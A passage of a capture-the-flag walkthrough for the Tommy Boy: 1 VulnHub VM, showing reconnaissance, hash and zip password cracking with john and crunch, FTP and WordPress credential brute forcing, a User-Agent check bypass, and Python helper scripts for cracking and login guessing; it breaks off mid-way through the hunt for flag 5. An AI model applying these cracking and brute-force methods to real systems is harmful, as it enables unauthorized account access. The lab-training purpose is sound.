Tommy Boy: 1

I decided to take a break from the exploit-exercises levels and tackle a boot-to-root challenge from vulnhub.com. The newest VM on their list today is called Tommy Boy: 1. Here is the description:

Description
=================

HOLY SCHNIKES! Tommy Boy needs your help!

The Callahan Auto company has finally entered the world of modern technology and stood up a Web server for their customers to use for ordering brake pads.

Unfortunately, the site just went down and the only person with admin credentials is Tom Callahan Sr. - who just passed away! And to make matters worse, the only other guy with knowledge of the server just quit!

You'll need to help Tom Jr., Richard and Michelle get the Web page restored again. Otherwise Callahan Auto will most certainly go out of business :-(

Notes
=================

The primary objective is to restore a backup copy of the homepage to Callahan Auto's server. However, to consider the box fully pwned, you'll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message.


I love the movie Tommy Boy, so this should be fun. To start the challenge I download the .ova file and import it into VirtualBox. As usual, I set its network settings so it cannot reach my host machine or the internet. The VM obtains the IP address 10.5.5.107 from my Kali machine's DHCP server and I begin with an nmap scan. I use -p to cover all 65535 TCP ports (the default scan only covers the top 1000, which would have missed the FTP server), -A to enable OS detection, version detection, script scanning and traceroute, and -n to skip DNS resolution.

nmap -n -A -p 1-65535 10.5.5.107
Starting Nmap 7.00 ( https://nmap.org ) at 2016-07-30 11:00 EDT
Nmap scan report for 10.5.5.107
Host is up (0.00046s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
| /6packsofb...soda /lukeiamyourfather 
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
65534/tcp open  ftp     ProFTPD
MAC Address: 08:00:27:95:F7:55 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 10.5.5.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds

According to the scan the target is running SSH on port 22, Apache web servers on ports 80 and 8008, and a ProFTPD server on port 65534. One of the nmap scripts also printed the contents of robots.txt from the port 80 server. Robots.txt is a list of paths the site owner asks well-behaved crawlers not to index; it is purely advisory, so it is one of the first places to look during recon because it often names exactly the content someone wanted hidden. One of the entries, /flag-numero-uno.txt, looks promising, so I pull down that page's content.

wget -qO- 10.5.5.107/flag-numero-uno.txt
This is the first of five flags in the Callhan Auto server.  You'll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

It looks like I am off to a good start. The first flag is always easy. I check out the rest of the paths from robots.txt in Firefox, but they just serve pictures from the movie and don't turn up anything interesting.

My next step is to visit the homepage on the port 80 server.

[screenshot: Tommy_Homepage_80]

Yup, their server is broken! I check the page source for anything interesting and find a commented-out conversation in the HTML.

<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="FF3339"><H2>SYSTEM ERROR!</H2></font>
If your'e reading this, the Callahan Auto customer ordering system is down.  Please restore the backup copy immediately.
<p>
See Nick in IT for assistance.
</html>
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> 
<!--Comment from Richard: Ah! How could I forget?  Thanks-->

It sounds like I need to check out the blog to find the important information Tom was storing. I watch the YouTube video to get the name of the place and head to http://10.5.5.107/prehistoricforest/.

[screenshot: Tommy_wordpress_01]

Nice, I land in a WordPress blog. What kind of blog would use that ugly template...

Anyway, some of these posts look interesting. First Richard posts some password-protected information, then Tommy asks what the password is. There is one comment on Tommy's post:

[screenshot: Tommy_comment]

I need to check out 10.5.5.107/richard, but first I scroll through the blog to look at the other posts and comments. The first post is from Big Tom and has a single comment:

[screenshot: Tommy_flag2]

So I go pull down the second flag.

http://10.5.5.107/prehistoricforest/thisisthesecondflagyayyou.txt
You've got 2 of five flags - keep it up!

Flag data: Z4l1nsky

Nothing else in the blog looks interesting, so I check out http://10.5.5.107/richard/ to try to find the password for the protected post. I just end up at a JPG of Richard driving a car and looking shocked. I think this is the scene where they hit a deer, so I try guessing a few passwords. I got stuck here for a bit.

After scouring the image for information over and over again, I finally notice the EXIF User Comment field when I dump the metadata with exiftool:

exiftool shockedrichard.jpg
ExifTool Version Number         : 10.07
File Name                       : shockedrichard.jpg
Directory                       : .
File Size                       : 163 kB
File Modification Date/Time     : 2016:07:30 11:51:21-04:00
File Access Date/Time           : 2016:07:30 11:58:53-04:00
File Inode Change Date/Time     : 2016:07:30 11:51:21-04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Exif Byte Order                 : Little-endian (Intel, II)
Software                        : Google
Copyright                       : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Exif Version                    : 0220
User Comment                    : ce154b5a8e59c89732bc25d6a2e6b90b
Exif Image Width                : 1600
Exif Image Height               : 1029
XMP Toolkit                     : Image::ExifTool 9.97
Rights                          : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Creator Tool                    : Google
Profile CMM Type                : Lino
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : IEC
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : HP
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Current IPTC Digest             : adfc7551120fa16884c295b6d397931f
Envelope Record Version         : 4
Coded Character Set             : UTF8
Application Record Version      : 4
Copyright Notice                : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
IPTC Digest                     : adfc7551120fa16884c295b6d397931f
Image Width                     : 1600
Image Height                    : 1029
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1600x1029
Megapixels                      : 1.6

The user comment was probably added to the image as a hint. It doesn't look like a likely password, but I try it anyway to be thorough. It is 32 hex characters (128 bits), which is consistent with an unsalted MD5 digest, so I run john against it with the rockyou wordlist.

echo "ce154b5a8e59c89732bc25d6a2e6b90b" > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE2 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
spanky           (?)
1g 0:00:00:00 DONE (2016-07-31 11:37) 5.882g/s 8117p/s 8117c/s 8117C/s lacoste..spanky
Use the "--show" option to display all of the cracked passwords reliably
Session completed
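The same two steps john just performed, the length/charset guess and the dictionary attack, as an added example in Python (not part of the original write-up). The digest is the EXIF User Comment from the page; the wordlist is a constructed stand-in for rockyou.txt, and crack_file() shows how to stream the real file. The length check is only a heuristic: 32 hex characters is also what NTLM or MD4 look like.

```python
"""Added example: identify a bare hex digest by length and dictionary-crack it."""
import hashlib
import re

HEX = re.compile(r"^[0-9a-fA-F]+$")

# digest length in hex characters -> the unsalted algorithm it is most often
BY_LENGTH = {32: "md5", 40: "sha1", 56: "sha224", 64: "sha256", 96: "sha384", 128: "sha512"}


def guess_hash_type(s):
    """Heuristic only: returns an algorithm name for a plausible hex digest, else None."""
    s = s.strip()
    if HEX.match(s):
        return BY_LENGTH.get(len(s))
    return None


def md5_hex(word):
    """Hex MD5 of a UTF-8 string (what john's Raw-MD5 format compares against)."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def crack(digest, words, algo="md5"):
    """Return the first word whose digest equals `digest`, or None."""
    digest = digest.strip().lower()
    h = getattr(hashlib, algo)
    for w in words:
        if h(w.encode("utf-8")).hexdigest() == digest:
            return w
    return None


def crack_file(digest, path, algo="md5"):
    """Stream a big wordlist such as /usr/share/wordlists/rockyou.txt line by line.
    rockyou.txt is not valid UTF-8 throughout, hence latin-1."""
    with open(path, "r", encoding="latin-1") as f:
        return crack(digest, (line.rstrip("\r\n") for line in f), algo)


if __name__ == "__main__":
    target = "ce154b5a8e59c89732bc25d6a2e6b90b"   # EXIF User Comment from the page
    print(guess_hash_type(target))
    # constructed mini wordlist standing in for rockyou.txt
    print(crack(target, ["password", "lacoste", "spanky", "callahan"]))
```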

That's more like it. I try "spanky" and get into the protected post. Here are the contents:

Michelle/Tommy,

This is f’d up.

I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup.  Unfortunately, only Big Tom had the passwords to log into the system.  I can’t find his passwords anywhere.  All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:

Hey Richy,

So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.

Here’s everything I know:

    You guys are all hopeless sheep :-/
    The Callahan Auto Web site is usually pretty stable.  But if for some reason the page is ever down, you guys will probably go out of business.  But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
        IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore.  Warning: Big Tom always forgets his account password.  Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called.  Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

    I left a few other bits of information in my home folder, which the new guy can access via FTP.  Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it.  Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for.  And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again.  Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

    You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password.  I removed my SSH access because I *DON’T* want you calling me in case of an emergency.  But my creds still work on FTP.  Your new fresh fish can connect using my credentials and if he/she has half a brain.

Good luck, schmucks!

LOL

-Nick

Michelle/Tommy…WTF are we going to do?!?!  If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

I already identified the FTP server on port 65534 in my initial nmap scan. The credentials should be "nickburns" with a simple password, so I fire up a password attack with medusa. The attack failed at first because the FTP server was down (Nick's note says it is only up for 15 minutes out of every 30). I set up a script to keep probing the port until it answers:

#!/bin/bash
# Probe the flaky FTP port once a second: -z connects without sending data,
# -w 1 gives up after one second so the loop never hangs on a half-open port.
while :
do
	nc -nvz -w 1 10.5.5.107 65534
	sleep 1
done

When the server finally came back up, I started a medusa password attack:

medusa -h 10.5.5.107 -u nickburns -P /usr/share/wordlists/rockyou.txt -M ftp -n 65534

While medusa was working through rockyou (over 14 million passwords), I tried logging in manually to see if I could guess the password, since it is supposedly simple. The first password I try is the username, and it works... In retrospect I should have started medusa with -e ns, which tries an empty password (n) and the username as the password (s) before touching the wordlist.

nc -nv 10.5.5.107 65534
(UNKNOWN) [10.5.5.107] 65534 (?) open
220 Callahan_FTP_Server 1.3.5
USER nickburns
331 Password required for nickburns
PASS nickburns
230 User nickburns logged in
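An added example, not from the original write-up, of the two lessons in this step: wait for the flapping port instead of failing once, and try the null-password and username-as-password guesses (medusa's -e ns) before any wordlist. The host and port are the write-up's values; the probe and login functions are injected so the logic runs and is testable offline, and ftp_login() is only used when the script is run for real.

```python
"""Added example: poll a flaky FTP port, then try trivial credentials first."""
import socket
import time
from ftplib import FTP, error_perm

HOST, PORT = "10.5.5.107", 65534   # values from the write-up


def port_open(host, port, timeout=2.0):
    """TCP connect with a timeout; True if something accepted the connection."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def wait_for_port(probe, interval=5.0, max_wait=None):
    """Block until probe() is True. Returns False if max_wait seconds elapse first."""
    waited = 0.0
    while not probe():
        if max_wait is not None and waited >= max_wait:
            return False
        time.sleep(interval)
        waited += interval
    return True


def trivial_passwords(user):
    """The guesses medusa -e ns makes (empty password, password == username),
    plus a few cheap variants, yielded once each."""
    seen = set()
    for p in ("", user, user.lower(), user[::-1], user + "1", user + "123", "password"):
        if p not in seen:
            seen.add(p)
            yield p


def first_valid(login, user, candidates):
    """login(user, password) -> bool. Returns the first password that works, or None."""
    for pw in candidates:
        if login(user, pw):
            return pw
    return None


def ftp_login(user, password, host=HOST, port=PORT, timeout=5.0):
    """Real attempt against the FTP server; one connection per try."""
    try:
        ftp = FTP()
        ftp.connect(host, port, timeout=timeout)
        ftp.login(user, password)
        ftp.quit()
        return True
    except error_perm:
        return False   # 530: bad credentials
    except OSError:
        return False   # server flapped; wait_for_port() again and retry


if __name__ == "__main__":
    wait_for_port(lambda: port_open(HOST, PORT))
    print(first_valid(ftp_login, "nickburns", trivial_passwords("nickburns")))
```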

Once logged in, I find a readme.txt file:

cat readme.txt
To my replacement:

If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto.  HAHAHAHAHAAH! SUCKER!  This is the worst job ever!  You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!

Anyway I'm not completely without mercy.  There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years.  Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well.  But guess what?
He always forgets THAT password as well.  Luckily I'm a nice guy and left him a hint sheet.

Good luck, schmuck!

LOL.

-Nick

I find the hidden folder at http://10.5.5.107:8008/NickIzL33t, but it serves up a useless page.

[screenshot: Tommy_dropbox]

Nothing is hidden in the page source, so I start looking for the encrypted .zip file. Nothing turns up, so I start playing with the HTTP headers. I use the Burp proxy to intercept my requests to the page, and when I examine the responses I realize the server is answering with a 403 (Forbidden), so the "useless page" is really a custom error document. Given all the Steve Jobs references, I change my User-Agent header to look like an iPhone instead of Firefox. (A User-Agent check is not access control: the header is entirely client-controlled, which is exactly why this works.)

[screenshot: Tommy_IphoneHeader]

I'm no longer getting a 403, and a different page greets me:

[screenshot: Tommy_PassedTest]

So now I need to guess a particular URL on the server. DirBuster is a good tool for enumerating directories and files on a web server. First I configure DirBuster to send the iPhone User-Agent header, and I also configure Burp to rewrite the header on all of my future browser requests.

[screenshot: Tommy_dirbust]

Next I give DirBuster the directory I care about, the wordlist to use and the file extension to append to each check, and I disable directory checking. Then I kick it off and let it run through the wordlist.

[screenshot: Tommy_dirbuster_2]

I crank the threads up to 175 so it goes faster, and before long I get a hit for fallon1.html.

[screenshot: Tommy_dirbuster_3]

I visit fallon1.html to see what is there.

[screenshot: Tommy_fallon1]

Nice.  I got the third flag.

THREE OF 5 FLAGS - you're awesome sauce.

Flag data: TinyHead

I also get an encrypted list of passwords and a hint file to help crack it.

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD!  
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one 
big chunk ok?  Heh, "big chunk."  A big chunk typing big chunks.  That's funny.

LOL

-Nick

This sounds like a job for crunch. In a crunch -t mask, "," stands for an uppercase letter, "%" for a digit, "@" for a lowercase letter and "^" for a symbol, and every other character is taken literally, so the hint maps directly onto a 13-character mask. I use crunch to generate every candidate:

crunch 13 13 -t bev,%%@@^1995 -o big_tom_dict.txt
Crunch will now generate the following amount of data: 812011200 bytes
774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800 

crunch:  29% completed generating output

crunch:  62% completed generating output

crunch:  93% completed generating output

crunch: 100% completed generating output
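The crunch mask semantics as a Python generator, added here as an example and not part of the original write-up. It shows where the 58,000,800 figure comes from (26 * 10 * 10 * 26 * 26 * 33, with crunch's default symbol set of 33 characters including the space) and lets you search the keyspace lazily, feeding each candidate to a check callable, instead of writing 774 MB to disk. The mask and the recovered password are the page's; the symbol set is what I understand crunch to use by default, and the page's line count is consistent with it.

```python
"""Added example: crunch -t mask -> keyspace size, candidate generator, search."""
import itertools
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGIT = string.digits
# crunch's default symbol set (33 characters, space included)
SYMBOL = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ "

PLACEHOLDERS = {",": UPPER, "%": DIGIT, "@": LOWER, "^": SYMBOL}


def slots(mask):
    """One character set per mask position; literal characters become one-element sets."""
    return [PLACEHOLDERS.get(c, c) for c in mask]


def mask_size(mask):
    """Number of candidates the mask expands to."""
    n = 1
    for s in slots(mask):
        n *= len(s)
    return n


def mask_candidates(mask):
    """Lazily yield every string matching the mask; the rightmost slot varies fastest."""
    for tup in itertools.product(*slots(mask)):
        yield "".join(tup)


def matches_mask(candidate, mask):
    """Sanity check: does a recovered password actually fit the policy encoded by the mask?"""
    s = slots(mask)
    return len(candidate) == len(s) and all(c in cs for c, cs in zip(candidate, s))


def search(mask, check, limit=None):
    """Run check(candidate) over the keyspace (e.g. a zip password test) and
    return the first hit, or None after `limit` tries / exhaustion."""
    for i, cand in enumerate(mask_candidates(mask)):
        if limit is not None and i >= limit:
            return None
        if check(cand):
            return cand
    return None


if __name__ == "__main__":
    mask = "bev,%%@@^1995"   # from the page: bev + upper + 2 digits + 2 lower + symbol + 1995
    print(mask_size(mask))   # 58000800, matching crunch's line count
    print(matches_mask("bevH00tr$1995", mask))
```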

Next I extract the password hash from the zip file:

zip2john t0msp4ssw0rdz.zip >encrypted.hash
ver 14  efh 5455  efh 7875  t0msp4ssw0rdz.zip->passwords.txt PKZIP Encr: 2b chk, TS_chk, cmplen=332, decmplen=641, crc=DF15B771

Then I fire off john to crack it using the generated wordlist:

john encrypted.hash --wordlist=big_tom_dict.txt
Loaded 1 password hash (PKZIP [32/64])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
bevH00tr$1995    (t0msp4ssw0rdz.zip)
1g 0:00:00:09 DONE (2016-08-01 16:20) 0.09842g/s 1538Kp/s 1538Kc/s 1538KC/s bevH00re{1995..bevH00vy\1995
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now that I have the password, I unzip the file and take a look at the contents:

cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

Next I need to get into Big Tom's account on the company blog to look at his drafts. I start guessing Queen song names... then I realize the famous Queen song is presumably "We Will Rock You", i.e. a hint at the rockyou password list, so I set up another password attack.
I don't trust "Username: bigtom(I think?)", so first I enumerate the users with wpscan:

wpscan --url http://10.5.5.107/prehistoricforest/  --enumerate u
[+] Identified the following 4 user/s:
    +----+----------+-------------------+
    | Id | Login    | Name              |
    +----+----------+-------------------+
    | 1  | richard  | richard           |
    | 2  | tom      | Big Tom           |
    | 3  | tommy    | Tom Jr.           |
    | 4  | michelle | Michelle Michelle |
    +----+----------+-------------------+

I knew it. The real username is tom. Now I start the password attack:

wpscan --url http://10.5.5.107/prehistoricforest/ --wordlist /usr/share/wordlists/rockyou.txt --username tom
Brute Forcing 'tom' Time: 00:08:55 < > (24669 / 14344393)  0.17%  ETA: 86:24:32
  [+] [SUCCESS] Login : tom Password : tomtom1


  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | tom   |      | tomtom1  |
  +----+-------+------+----------+

Now I can log into the tom account on WordPress and look at his drafts:

Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here:

1938!!

Nick, if you're reading this, I DON'T CARE IF I"M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I"LL PUT MY PASSWORDS ANY DANG PLACE I WANT.

With this information I can SSH into the server as bigtommysenior with the password fatguyinalittlecoat1938!!

ssh bigtommysenior@10.5.5.107
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-31-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

143 packages can be updated.
0 updates are security updates.


Last login: Thu Jul 14 13:45:57 2016
bigtommysenior@CallahanAutoSrv01:~$

I check out Big Tom's home folder and find flag 4. I'm getting close now.

ls -al
total 40
drwxr-x--- 4 bigtommysenior bigtommysenior 4096 Jul  8 08:57 .
drwxr-xr-x 5 root           root           4096 Jul  7 00:17 ..
-rw------- 1 bigtommysenior bigtommysenior    0 Jul 21 17:47 .bash_history
-rw-r--r-- 1 bigtommysenior bigtommysenior  220 Jul  7 00:12 .bash_logout
-rw-r--r-- 1 bigtommysenior bigtommysenior 3771 Jul  7 00:12 .bashrc
drwx------ 2 bigtommysenior bigtommysenior 4096 Jul  7 00:16 .cache
-rw-r--r-- 1 bigtommysenior bigtommysenior  307 Jul  7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior  237 Jul  7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior  630 Jul  7 17:59 LOOT.ZIP
drwxrwxr-x 2 bigtommysenior bigtommysenior 4096 Jul  7 13:50 .nano
-rw-r--r-- 1 bigtommysenior bigtommysenior  675 Jul  7 00:12 .profile
-rw-r--r-- 1 bigtommysenior bigtommysenior    0 Jul  7 00:17 .sudo_as_admin_successful
cat el-flag-numero-quatro.txt
YAY!  Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.

Flag data: EditButton

But...but...where's flag 5?  

I'll make it easy on you.  It's in the root of this server at /5.txt

There are a few other interesting things in the home folder: callahanbak.bak, LOOT.ZIP, and .sudo_as_admin_successful. (On Ubuntu, sudo creates that last file the first time a member of the admin/sudo group runs it successfully, so this account has used sudo before and sudo -l is worth checking.)

Next I look at the .bak file, and it does look like the HTML needed to restore the Callahan website:

cat callahanbak.bak
<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="0000ff"><H2><center>SYSTEM STATUS: ONLINE</center></H2></font>
<H3>We're happy to be serving all your brakepad needs.</H3>
<p>
<center><img src="ca.jpeg"></center>
<p>
<p>
</html>
<!---->

Now I just need to replace the existing site with this backup copy. First I find where the site's files live by checking the Apache virtual host configuration:

ls /etc/apache2/sites-enabled/
000-default.conf  2.conf
cat /etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	#ServerName www.example.com

	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html

	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

When I look in /var/www/html it is full of hundreds of subfolders, which is strange, but it does have an index.html containing the SYSTEM ERROR page. The file is owned by bigtommysenior, so I can replace it. I keep a copy of the broken page first, then drop the backup in place:

cp /var/www/html/index.html ~/
cp callahanbak.bak /var/www/html/index.html

I refresh the website and confirm that it’s restored.

[screenshot: Tommy_WebRestored]

Perfect. Now I just need flag #5 and, probably, root on the server. The flag text already told me where flag 5 is, so I check its permissions:

ls -al /
total 105
drwxr-xr-x  25 root     root      4096 Jul 15 12:35 .
drwxr-xr-x  25 root     root      4096 Jul 15 12:35 ..
-rwxr-x---   1 www-data www-data   520 Jul  7 15:36 .5.txt
drwxr-xr-x   2 root     root      4096 Jul  6 08:32 bin
drwxr-xr-x   4 root     root      1024 Jul 14 13:38 boot
drwxr-xr-x  19 root     root      4140 Aug  2 04:21 dev
drwxr-xr-x  92 root     root      4096 Jul 21 17:47 etc
drwxr-xr-x   5 root     root      4096 Jul  7 00:17 home
lrwxrwxrwx   1 root     root        32 Jul 14 13:38 initrd.img -> boot/initrd.img-4.4.0-31-generic
lrwxrwxrwx   1 root     root        32 Jul  6 23:59 initrd.img.old -> boot/initrd.img-4.4.0-28-generic
drwxr-xr-x  22 root     root      4096 Jul  6 11:01 lib
drwxr-xr-x   2 root     root      4096 Jul  6 11:01 lib32
drwxr-xr-x   2 root     root      4096 Jul  6 08:30 lib64
drwxr-xr-x   2 root     root      4096 Jul  6 11:01 libx32
drwx------   2 root     root     16384 Jul  6 08:30 lost+found
drwxr-xr-x   3 root     root      4096 Jul  6 08:30 media
drwxr-xr-x   2 root     root      4096 Apr 20 17:08 mnt
drwxr-xr-x   2 root     root      4096 Apr 20 17:08 opt
dr-xr-xr-x 190 root     root         0 Aug  2  2016 proc
drwx------   3 root     root      4096 Aug  2 04:21 root
drwxr-xr-x  26 root     root       900 Aug  2 04:22 run
drwxr-xr-x   2 root     root     12288 Jul  6 23:59 sbin
drwxr-xr-x   2 root     root      4096 Apr 19 09:31 snap
drwxr-xr-x   2 root     root      4096 Apr 20 17:08 srv
dr-xr-xr-x  13 root     root         0 Aug  2 04:21 sys
drwxrwxrwt   8 root     root      4096 Aug  2 04:31 tmp
drwxr-xr-x  12 root     root      4096 Jul  6 11:01 usr
drwxr-xr-x  15 root     root      4096 Jul 14 13:53 var
lrwxrwxrwx   1 root     root        29 Jul 14 13:38 vmlinuz -> boot/vmlinuz-4.4.0-31-generic
lrwxrwxrwx   1 root     root        29 Jul  6 23:59 vmlinuz.old -> boot/vmlinuz-4.4.0-28-generic

Flag 5 is there, but note it is actually /.5.txt (a hidden file, not /5.txt as the hint says), and its mode is -rwxr-x--- with owner and group www-data, so only the www-data user or group can read it and bigtommysenior cannot. I try unzipping LOOT.ZIP, but it is password protected. I suspect that is what the flag codes are for.

I know the www-data account runs the Apache web server, and I know there is a second site on this server on port 8008, so I go check out that site's files:

cat /etc/apache2/sites-enabled/2.conf
<VirtualHost *:8008>
	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
